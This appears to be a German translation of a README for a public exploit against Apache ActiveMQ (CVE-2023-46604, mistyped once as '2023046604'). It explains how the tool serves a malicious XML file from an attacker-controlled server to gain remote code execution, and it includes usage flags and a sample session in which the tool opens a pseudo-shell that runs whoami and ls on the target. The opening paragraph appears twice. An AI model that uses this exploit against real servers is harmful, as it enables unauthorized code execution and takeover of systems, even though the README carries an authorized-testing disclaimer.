
Dieses Skript nutzt CVE-2023046604 (Apache ActiveMQ) aus, um eine Pseudo-Shell zu erzeugen. Die Schwachstelle ermöglicht Remotecodeausführung aufgrund unsicherer Deserialisierung innerhalb des OpenWire-Protokolls.
Dieses Skript nutzt CVE-2023046604 (Apache ActiveMQ) aus, um eine Pseudo-Shell zu generieren. Die Sicherheitslücke ermöglicht die Remote-Code-Ausführung aufgrund einer unsicheren Deserialisierung im OpenWire-Protokoll.
CVE-2023-46604 ist eine Deserialisierungsschwachstelle im OpenWire-Protokoll von Apache ActiveMQ. Diese Schwachstelle kann von einem Angreifer ausgenutzt werden, um beliebigen Code auf dem Server auszuführen, auf dem ActiveMQ läuft. Ein Angreifer kann eine bösartige XML-Datei erstellen, deren Befehle vom entfernten Server ausgeführt werden.
Dieser Exploit automatisiert und abstrahiert den Prozess der XML-Dokumenterstellung, stellt einen einfachen Server zur Bereitstellung der Datei bereit und empfängt über POST Informationen vom Zielserver zurück. Dies ermöglicht eine fortlaufende Ausnutzung, ohne dass eine Reverse-Shell aufgerufen oder eine Binärdatei bereitgestellt werden muss.
Stellen Sie vor dem Ausführen des Exploit-Skripts sicher, dass Folgendes vorhanden ist:
Das Skript erfordert:
Optional:
usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]
optional arguments:
-h, --help show this help message and exit
-i IP, --ip IP ActiveMQ Server IP or Hostname
-p PORT, --port PORT ActiveMQ Server Port, defaults to 61616
-si SRVIP, --srvip SRVIP
Serve IP
-sp SRVPORT, --srvport SRVPORT
Serve port, defaults to 8080
$python3 exploit.py -i 10.129.230.87 -p 61616 -si 10.10.14.59 -sp 8080
#################################################################################
# CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell #
# Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d #
#################################################################################
[*] Target: 10.129.230.87:61616
[*] Serving XML at: http://10.10.14.59:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit
#################################################################################
# Not yet connected, send a command to test connection to host. #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you #
# want to re-check the connection. #
#################################################################################
[Target not responding!]$ whoami
activemq
Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x 5 activemq activemq 4.0K Nov 7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov 6 01:18 ..
-rwxr-xr-x 1 activemq activemq 21K Apr 20 2021 activemq
-rwxr-xr-x 1 activemq activemq 6.1K Apr 20 2021 activemq-diag
-rw-r--r-- 1 activemq activemq 17K Apr 20 2021 activemq.jar
-rw-r--r-- 1 activemq activemq 5.5K Apr 20 2021 env
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 linux-x86-32
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 linux-x86-64
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 macosx
-rw-r--r-- 1 activemq activemq 82K Apr 20 2021 wrapper.jar
Apache ActiveMQ$
Dieser Exploit baut auf dem ursprünglichen POC in Go von X1r0z und dem Python POC von evkl1d auf.
Dieser Code wird ausschließlich zu Bildungs- und ethischen Sicherheitstestzwecken bereitgestellt. Er sollte verantwortungsvoll und nur in Umgebungen verwendet werden, in denen eine ausdrückliche Genehmigung erteilt wurde. Unbefugte oder böswillige Nutzung ist strengstens untersagt. Durch die Verwendung dieses Codes erklären Sie sich damit einverstanden, alle geltenden Gesetze, Vorschriften und ethischen Standards in Ihrem Rechtsraum einzuhalten. Die Ersteller und Mitwirkenden lehnen jede Haftung für Schäden oder Folgen ab, die aus der missbräuchlichen oder unbefugten Nutzung dieses Codes entstehen.